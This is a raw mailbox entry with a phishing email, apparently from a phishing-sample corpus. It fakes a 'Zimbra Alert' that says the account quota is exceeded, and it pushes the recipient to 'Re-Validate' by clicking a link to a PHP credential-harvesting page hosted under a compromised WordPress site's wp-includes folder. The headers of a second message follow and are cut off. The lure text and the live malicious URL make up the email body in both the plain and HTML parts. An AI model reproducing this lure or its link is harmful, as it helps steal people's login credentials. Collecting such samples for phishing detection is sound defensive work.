From: "Zimbra Alert"<infoz@zimbra.com>
Date: Wed, 08 Feb 2017 12:19:24 +0100
X-Antivirus: avast! (VPS 170206-3, 02/06/2017), Outbound message
X-Antivirus-Status: Clean
Message-Id: <20170208111928.2592312A73B94@sepsrvzcs001.scgg.gob.hn>
Status: O
X-Status: 
X-Keywords:                  
X-UID: 59

You will not see this in a MIME-aware mail reader.
--===============0200389129==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

Dear jose@monkey.org , 
Your account has exceeded it quota limit as set by Administrator, and you m=
ay not be able to send or receive new mails until you Re-Validate your jose=
@monkey.org account. 
To Re-Validate jose@monkey.org account, Please CLICK: Re-Validate jose@monk=
ey.org Account 

---
This email has been checked for viruses by Avast antivirus software.
https://www.avast.com/antivirus

--===============0200389129==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY>Dear jose@monkey.org , 
<DIV></DIV><BR>Your account has exceeded it quota limit as set by Administr=
ator, and you may not be able to send or receive new mails until you Re-Val=
idate your jose@monkey.org account. 
<DIV></DIV><BR>To Re-Validate jose@monkey.org account, Please CLICK:<SPAN>&=
nbsp;</SPAN><A style=3D"OUTLINE-STYLE: none; COLOR: rgb(0,0,204); TEXT-DECO=
RATION: underline" href=3D"http://www.agrikencanaperkasa.com/wp-includes/Si=
mplePie/Net/ehis/mail4.php?jose@monkey.org=3D13InboxLightaspxn.1774256418&a=
mp;fid.4.1252899642&amp;fid=3D1&amp;fav.1&amp;rand.13InboxLight.aspxn.17742=
56418&amp;fid.1252899642&amp;fid.1&amp;fav.1&amp;login=3Djose@monkey.org&am=
p;loginID=3D$loginID&amp;.rand=3D13InboxLight.aspx?n=3D1774256418&amp;fid=
=3D4#n=3D1252899642&amp;fid=3D1&amp;fav=3D1" rel=3Dnofollow target=3D_blank=
><SPAN>Re-Validate jose@monkey.org Account</SPAN></A></SPAN></FONT>
<DIV></DIV>
<br /><br />
<hr style=3D'border:none; color:#909090; background-color:#B0B0B0; height: =
1px; width: 99%;' />
<table style=3D'border-collapse:collapse;border:none;'>
	<tr>
		<td style=3D'border:none;padding:0px 15px 0px 8px'>
			<a href=3D"https://www.avast.com/sig-email?utm_medium=3Demail&utm_source=
=3Dlink&utm_campaign=3Dsig-email&utm_content=3Demailclient">
				<img border=3D0 src=3D"http://static.avast.com/emails/avast-mail-stamp.=
png" alt=3D"Avast logo" />
			</a>
		</td>
		<td>
			<p style=3D'color:#3d4d5a; font-family:"Calibri","Verdana","Arial","Helv=
etica"; font-size:12pt;'>
				This email has been checked for viruses by Avast antivirus software.
				<br><a href=3D"https://www.avast.com/sig-email?utm_medium=3Demail&utm_s=
ource=3Dlink&utm_campaign=3Dsig-email&utm_content=3Demailclient">www.avast.=
com</a>
			</p>
		</td>
	</tr>
</table>
<br />
</BODY></HTML>
--===============0200389129==--

From jose@monkey.org Wed Feb  8 20:08:41 2017 +0000
Return-Path: faulkd@sbwc.ga.gov
Delivered-To: jose@monkey.org
X-FDA: 72494511642.15.vase71_4b02f625cc44f
X-Spam-Summary: 2,0,0,110402a1b440314d,d41d8cd98f00b204,faulkd@sbwc.ga.gov,,RULES_HIT:10:41:152:355:379:387:444:582:871:960:962:966:967:973:988:989:1000:1021:1029:1152:1158:1189:1260:1263:1313:1314:1345:1381:1436:1437:1516:1517:1518:1544:1575:1588:1589:1592:1594:1691:1711:1730:1764:1775:1792:2196:2199:2525:2526:2527:2528:2551:2553:2559:2562:2682:2685:2859:2892:2900:2902:2917:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3352:3650:3690:3865:3866:3867:3868:3870:3871:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4048:4321:4362:4379:4385:4552:5007:6117:6261:6264:6506:6658:6678:6747:6748:7281:7398:7688:7875:7903:8568:8603:8957:9025:9388:9390:9868:10004:10026:10049:10216:10919:11233:11604:11656:11658:11914:12043:12050:12166:12214:12340:12438:12519:12657:12661:12740:12895:13017:13018:13019:13095:13132:13139:13141:13230:13231:14096:14181:14659:14721:14885:21326:21433:21451:21499:30021:30054:30069:30075:30079:30091,0,RBL:167.199.224.254:@sbwc.ga.gov:.lbl8.mail
X-HE-Tag: vase71_4b02f625cc44f
X-Filterd-Recvd-Size: 251453
Received: from smtp.sbwc.ga.gov (smtp.sbwc.state.ga.us [167.199.224.254])
	by imf28.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed,  8 Feb 2017 20:08:35 +0000 (UTC)
Received: from SBWC-EXCH1.atl.sbwc.state.ga.us ([fe80::79b7:e1c3:5df5:9281])
 by SBWC-EXCH2.atl.sbwc.state.ga.us ([fe80::e11d:9833:17a9:d3cc%11]) with mapi
 id 14.03.0319.002; Wed, 8 Feb 2017 15:08:30 -0500
